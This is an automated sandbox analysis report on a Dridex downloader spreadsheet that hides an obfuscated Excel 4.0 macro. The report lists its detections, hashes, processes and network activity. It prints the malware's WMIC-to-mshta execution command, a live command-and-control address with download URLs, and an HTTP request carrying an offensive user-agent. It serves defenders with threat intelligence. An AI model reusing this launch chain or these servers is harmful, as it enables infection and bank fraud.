Windows Analysis Report order 4544471372.xls

Overview

General Information

Sample Name:	order 4544471372.xls
Analysis ID:	532575
MD5:	531039a455e1f0598cd201b785a1152a
SHA1:	4880df9e94090243029e54a34e941c70298401c7
SHA256:	cf0d6ea61f8e56f80f24792e356adeab2f92b6db2f980a9e5932415484f5b732
Tags:	Dridexxlsx
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Dridex Downloader

Multi AV Scanner detection for submitted file

Creates and opens a fake document (probably a fake document to hide exploiting)

Found Excel 4.0 Macro with suspicious formulas

Sigma detected: Microsoft Office Product Spawning Windows Shell

Document exploit detected (process start blacklist hit)

Creates processes via WMI

Found protected and hidden Excel 4.0 Macro sheet

Contains functionality to create processes via WMI

Found obfuscated Excel 4.0 Macro

Queries the volume information (name, serial number etc) of a device

Found a hidden Excel 4.0 Macro sheet

Potential document exploit detected (unknown TCP traffic)

Searches for the Microsoft Outlook file path

May sleep (evasive loops) to hinder dynamic analysis

Yara detected Xls With Macro 4.0

Detected TCP or UDP traffic on non-standard ports

Sigma detected: Suspicious WMI Execution

Detected potential crypto function

Creates a window with clipboard capturing capabilities

Potential document exploit detected (performs HTTP gets)

IP address seen in connection with other malware

Classification

Signatures

AV Detection:

Multi AV Scanner detection for submitted file

Source: order 4544471372.xls

ReversingLabs: Detection: 13%

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\wbem\WMIC.exe

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 149.129.254.152:8080

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 149.129.254.152:8080

Networking:

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 149.129.254.152:8080

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 149.129.254.152 149.129.254.152

Source: unknown	TCP traffic detected without corresponding DNS query: 149.129.254.152
Source: unknown	TCP traffic detected without corresponding DNS query: 149.129.254.152
Source: unknown	TCP traffic detected without corresponding DNS query: 149.129.254.152
Source: unknown	TCP traffic detected without corresponding DNS query: 149.129.254.152

Source: EXCEL.EXE, 00000000.00000002.690239943.0000000004FB0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689081220.0000000003A30000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: mshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmp	String found in binary or memory: http://149.129.254..6.0?_
Source: mshta.exe, 00000006.00000002.688964982.00000000035E0000.00000004.00000001.sdmp	String found in binary or memory: http://149.129.254.152:8080
Source: mshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmp	String found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dad.12
Source: mshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmp	String found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5.macroE
Source: mshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmp	String found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cacro
Source: mshta.exe, 00000006.00000002.689908661.0000000004365000.00000004.00000040.sdmp, mshta.exe, 00000006.00000002.688498350.0000000000553000.00000004.00000020.sdmp	String found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
Source: mshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmp	String found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcY
Source: mshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmp	String found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcation/
Source: mshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmp	String found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcd.ms-m
Source: mshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmp	String found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcel.tem
Source: mshta.exe, 00000006.00000002.689908661.0000000004365000.00000004.00000040.sdmp	String found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcu
Source: mshta.exe, 00000006.00000002.688964982.00000000035E0000.00000004.00000001.sdmp	String found in binary or memory: http://149.129.254.152:8V
Source: mshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmp	String found in binary or memory: http://149.129.254.152tf
Source: mshta.exe, 00000006.00000002.688964982.00000000035E0000.00000004.00000001.sdmp	String found in binary or memory: http://149.K
Source: EXCEL.EXE, 00000000.00000002.690239943.0000000004FB0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689081220.0000000003A30000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: EXCEL.EXE, 00000000.00000002.690239943.0000000004FB0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689081220.0000000003A30000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: EXCEL.EXE, 00000000.00000002.690515807.0000000005197000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689315306.0000000003C17000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: EXCEL.EXE, 00000000.00000002.690515807.0000000005197000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689315306.0000000003C17000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: EXCEL.EXE, 00000000.00000002.688581731.0000000000402000.00000004.00000001.sdmp	String found in binary or memory: http://ns.a
Source: EXCEL.EXE, 00000000.00000002.688581731.0000000000402000.00000004.00000001.sdmp	String found in binary or memory: http://ns.ad
Source: EXCEL.EXE, 00000000.00000002.688581731.0000000000402000.00000004.00000001.sdmp	String found in binary or memory: http://ns.ado
Source: EXCEL.EXE, 00000000.00000002.688581731.0000000000402000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.
Source: EXCEL.EXE, 00000000.00000002.688581731.0000000000402000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.c
Source: EXCEL.EXE, 00000000.00000002.688581731.0000000000402000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.co
Source: EXCEL.EXE, 00000000.00000002.692842180.0000000005486000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.op
Source: EXCEL.EXE, 00000000.00000002.693441234.0000000007976000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.693399201.00000000076A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.693370068.00000000071F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.693420826.0000000007816000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.open
Source: EXCEL.EXE, 00000000.00000002.693370068.00000000071F0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: EXCEL.EXE, 00000000.00000002.693441234.0000000007976000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.693399201.00000000076A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.693420826.0000000007816000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/package/2006/r
Source: mshta.exe, 00000006.00000002.689533804.0000000003E10000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: WMIC.exe, 00000003.00000002.559211343.0000000001AB0000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: EXCEL.EXE, 00000000.00000002.690515807.0000000005197000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689315306.0000000003C17000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: EXCEL.EXE, 00000000.00000002.690515807.0000000005197000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689315306.0000000003C17000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000006.00000002.689533804.0000000003E10000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: EXCEL.EXE, 00000000.00000002.690239943.0000000004FB0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689081220.0000000003A30000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: EXCEL.EXE, 00000000.00000002.690515807.0000000005197000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689315306.0000000003C17000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: EXCEL.EXE, 00000000.00000002.690239943.0000000004FB0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689081220.0000000003A30000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: mshta.exe, 00000006.00000002.689081220.0000000003A30000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83027875.png

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /6tfcnfucknugget4gpenis3dade5z6cpc HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: rapeHost: 149.129.254.152:8080

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities

Source: C:\Windows\System32\mshta.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

E-Banking Fraud:

Yara detected Dridex Downloader

Source: Yara match

File source: C:\ProgramData\tCeltZ.rtf, type: DROPPED

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable Editing" and "Enable Content" to display. 3 Data paiuo aano iiuiue oiue'luu:nod notr Servi
Source: Screenshot number: 4	Screenshot OCR: Enable Content" to display. 3 Data paiuo aano iiuiue oiue'luu:nod notr Service issue 4 -le 1Iau,

Found Excel 4.0 Macro with suspicious formulas

Source: order 4544471372.xls

Initial sample: EXEC

Found protected and hidden Excel 4.0 Macro sheet

Source: order 4544471372.xls

Initial sample: Sheet name: Macro1

Contains functionality to create processes via WMI

Source: EXCEL.EXE, 00000000.00000002.693141243.0000000005B5F000.00000004.00000001.sdmp

Binary or memory string: racle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\bsC:\Windows\System32\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\tCeltZ.rtf"tiC:\Windows\System32\Wbem\wmic.exeWinSta0\Default="=C:=C:\U

Found obfuscated Excel 4.0 Macro

Source: order 4544471372.xls

Macro extractor: Sheet: Macro1 high usage of CHAR() function: 26

Found a hidden Excel 4.0 Macro sheet

Source: order 4544471372.xls

Macro extractor: Sheet name: Macro1

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Detected potential crypto function

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_001272B8		0_2_001272B8
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_024E7820		0_2_024E7820

Source: order 4544471372.xls

ReversingLabs: Detection: 13%

Source: C:\Windows\System32\wbem\WMIC.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\tCeltZ.rtf"
Source: unknown	Process created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\tCeltZ.rtf
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\tCeltZ.rtf"	Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: EXCEL.EXE, 00000000.00000002.690239943.0000000004FB0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689081220.0000000003A30000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$order 4544471372.xls

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRFCC5.tmp

Jump to behavior

Source: classification engine

Classification label: mal96.troj.expl.evad.winXLS@4/6@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: order 4544471372.xls	Initial sample: OLE zip file path = xl/media/image1.png
Source: order 4544471372.xls	Initial sample: OLE zip file path = docProps/custom.xml
Source: 7E530000.0.dr	Initial sample: OLE zip file path = xl/media/image1.png

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

Creates and opens a fake document (probably a fake document to hide exploiting)

Source: unknown	Process created: cmd line: tceltz.rtf
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: cmd line: tceltz.rtf			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\wbem\WMIC.exe TID: 2536	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 2704	Thread sleep time: -60000s >= -30000s			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Yara detected Xls With Macro 4.0

Source: Yara match

File source: app.xml, type: SAMPLE

Source: EXCEL.EXE, 00000000.00000002.688649967.00000000007E0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.688551943.00000000012E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.688649967.00000000007E0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.688551943.00000000012E0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: EXCEL.EXE, 00000000.00000002.688649967.00000000007E0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.688551943.00000000012E0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation			Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.129.254.152	unknown	Singapore		45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc	false	Avira URL Cloud: safe	unknown

ID:	532575
Product:	CloudBasic
Start time:	14:03:21
Start date:	02.12.2021
Sample:	order 4544471372.xls
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	531039a455e1f0598cd201b785a1152a
SHA1:	4880df9e94090243029e54a34e941c70298401c7
SHA256:	cf0d6ea61f8e56f80f24792e356adeab2f92b6db2f980a9e5932415484f5b732
Filetype:	Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\tCeltZ.rtf	HTML document, ASCII text, with very long lines, with CRLF line terminators	A98108794EDA278A4E8626B56FE4B231	C0AB9E72B0E85C5BFB6B89F1428B5240EC6AEA60	DE3A47367EF37CD391133E378F03FE317D98A7916E4E192E5513EC19159A10D9
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83027875.png	PNG image data, 1170 x 183, 8-bit/color RGBA, non-interlaced	AA4CE969F3A7539F94F12DBA43D9D36F	67FBAFD61ABB04C68A2C4E074959C49AF1CF6DBB	BC3719669DEBD201C5FE2E16EB38605287FDD5DAB45445264388A58282F28999
C:\Users\user\Desktop\7E530000	Microsoft Excel 2007+	8AC1324488C58D023D2EB0B3373F820D	1CF1036172B47D06220C64EE3FA4AF140E4A7B34	5624CB55533E5BA17FB289446E25C36BD6FD1CB9201CE1171B9ECD32D6C4128A
C:\Users\user\Desktop\7E530000:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\Desktop\order 4544471372.xls (copy)	Microsoft Excel 2007+	8AC1324488C58D023D2EB0B3373F820D	1CF1036172B47D06220C64EE3FA4AF140E4A7B34	5624CB55533E5BA17FB289446E25C36BD6FD1CB9201CE1171B9ECD32D6C4128A
C:\Users\user\Desktop\~$order 4544471372.xls	data	797869BB881CFBCDAC2064F92B26E46F	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185

Windows Analysis Report order 4544471372.xls

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs